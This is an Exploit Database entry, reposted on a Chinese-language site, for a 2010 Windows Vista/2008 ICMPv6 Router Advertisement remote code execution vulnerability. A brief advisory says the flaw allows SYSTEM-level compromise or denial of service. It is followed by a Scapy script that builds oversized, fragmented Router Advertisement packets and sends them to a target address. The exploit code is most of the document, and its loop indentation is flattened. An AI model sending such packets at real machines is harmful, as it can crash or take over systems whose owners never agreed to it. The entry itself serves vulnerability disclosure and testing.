Microsoft Windows Vista/2008 – ICMPv6 Router Advertisement Remote Code Execution

• Exploit Database
• 35 阅读

• 作者： Sumit Gwalani
  日期： 2010-02-09
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33594/

• source: https://www.securityfocus.com/bid/38061/info
  
  Microsoft Windows TCP/IP protocol implementation is prone to a remote code-execution vulnerability.
  
  An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. 
  
  
  v6_dst = "<IPv6 address>"
  
  mac_dst = "<Mac address>"
  
  pkt = IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA() / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::") / Raw(load='A'*2008)
  
  l=fragment6(pkt, 1500)
  
  for p in l:
  sendp(Ether(dst=mac_dst)/p, iface="eth0")